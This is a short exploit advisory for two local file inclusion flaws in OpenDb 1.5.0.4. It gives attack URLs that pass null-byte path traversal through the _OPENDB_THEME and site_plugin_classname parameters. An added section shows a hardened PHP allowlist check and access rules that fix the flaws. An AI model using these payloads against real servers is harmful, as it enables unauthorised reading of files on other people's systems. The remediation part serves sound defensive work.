OpenDb 1.5.0.4 Multiple LFI Vulnerability :

Date : 2010-01-23 Author : ViRuSMaN
==============================================================================
[] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

[] Script: [ OpenDb ]
[] Language: [ PHP ]
[] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[] Founder: [ ViRuSMaN <[email protected] - [email protected]> ]
[] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===
#~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");

[] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]


===[ Exploit 2 ]===
#~ [C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");

[] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################
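
A hardened form of the two include statements quoted above, as an added example that is not part of the original advisory or of OpenDb's code: the request-supplied name must pass a strict character allowlist, and the resolved path must stay under the base directory. The function name safe_component() and the temporary directory layout are hypothetical; all sample values are constructed.

```php
<?php
// Added example, not OpenDb code. safe_component() and the temp layout are hypothetical.

function safe_component(string $name, string $baseDir, string $suffix, string $default): string
{
    // Strict allowlist: rejects NUL bytes, dots and path separators outright.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return $default;
    }
    // Resolve the final path and confirm it stays inside $baseDir.
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $name . $suffix);
    if ($base === false || $full === false) {
        return $default;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $name : $default;
}

// Constructed layout: <tmp>/theme/default/theme.php and <tmp>/theme/blue/theme.php
$root = sys_get_temp_dir() . '/opendb_demo_' . getmypid();
foreach (['default', 'blue'] as $t) {
    mkdir("$root/theme/$t", 0700, true);
    file_put_contents("$root/theme/$t/theme.php", "<?php // theme $t\n");
}

// Constructed request values, including a traversal string ending in a NUL byte.
$samples = ['blue', 'missing', '../../outside.txt' . "\0", 'blue/../default', ''];
foreach ($samples as $value) {
    // Stands in for the $_OPENDB_THEME value used on line 213 of begin.inc.php.
    $theme = safe_component($value, "$root/theme", '/theme.php', 'default');
    printf("%-28s -> %s\n", json_encode($value), $theme);
    include_once "$root/theme/$theme/theme.php"; // always a file under theme/
}
```

The same check applies to $site_plugin_classname with a base directory of ./site and a suffix of .class.php. Denying direct HTTP requests to the include/ and functions/ directories also removes the entry point that both URLs above rely on.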
